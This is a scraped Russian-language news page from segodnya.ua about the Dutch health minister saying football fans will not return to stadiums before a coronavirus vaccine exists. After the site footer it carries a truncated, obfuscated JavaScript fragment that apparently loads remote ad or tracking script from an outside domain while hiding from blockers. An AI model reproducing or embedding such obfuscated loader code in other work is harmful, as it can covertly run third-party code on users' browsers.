Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавируса

Министр здравоохранения Страны тюльпанов настроен весьма решительно

Судьба спортивных болельщиков в Нидерландах теперь зависит от медиков и ученых. Министр здравоохранения Страны тюльпанов Хьюго де Йонге сообщил, что болельщики не смогут посещать стадионы до тех пор, пока не будет найдена вакцина от коронавируса. Ранее мы сообщали, что чемпионат Нидерландов, который завершили досрочно, просит денег у властей.

«Пока мы не можем назвать точную дату отмены противовирусных мер и возвращения массовых мероприятий. На самом деле это будет возможно только при наличии вакцины, но никто не знает, сколько времени займет ее поиск. Конечно, мы надеемся, что это произойдет скоро, но речь может идти о годе или более длительном сроке», — цитирует де Йонге Voetbalprimeur.

Читайте также: Клуб из Нидерландов идет в суд: они не попали в еврокубки из-за досрочного завершения сезона

Ранее премьер-министр Нидерландов Марк Рютте объявил, что спортивные мероприятия в стране возобновятся с 1 сентября. А 24 апреля Королевский футбольный союз Нидерландов принял решение досрочно завершить розыгрыш Эредивизи. Раз первенство не было доиграно, то и чемпион страны не будет определен. А команды, находившиеся в зоне вылета, сохранят прописку в элитном дивизионе.

Реклама

Смотрите, как перед остановкой чемпионата Нидерландов "Аякс" переиграл "Херенвен"

Все подробности в спецтеме Коронавирус

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

болельщики
вакцина
чемпионат Голландии
коронавирус
Министр здравоохранения

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавируса«Анита-бомбита»: после развода с Артемом Кравцом его бывшую жену тут же позвали замужФутбол 	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавирусаПереворот в футболе: из-за коронавируса ФИФА заставит весь мир играть, как МилевскийФутбол 	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавирусаГолая госпожа: жена бывшего футболиста «Динамо» предстала в новом откровенном образеФутбол 	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавирусаЖуткие кадры: «Динамо» «сожгло» траву на своем стадионе и призвало сделать то же на других аренахФутбол 	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавирусаЖена бывшей звезды «Динамо» блеснула актерскими способностями в разговоре с ЗеленскимФутбол 	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавирусаЭкс-форвард «Реала», отказавшийся помогать в борьбе с коронавирусом, показал свой дорогущий автопаркФутбол

Новости партнеров

Загрузка…

загрузка…

	Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавируса

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “Болельщиков не пустят на стадионы Нидерландов, пока не изобретут вакцину от коронавируса”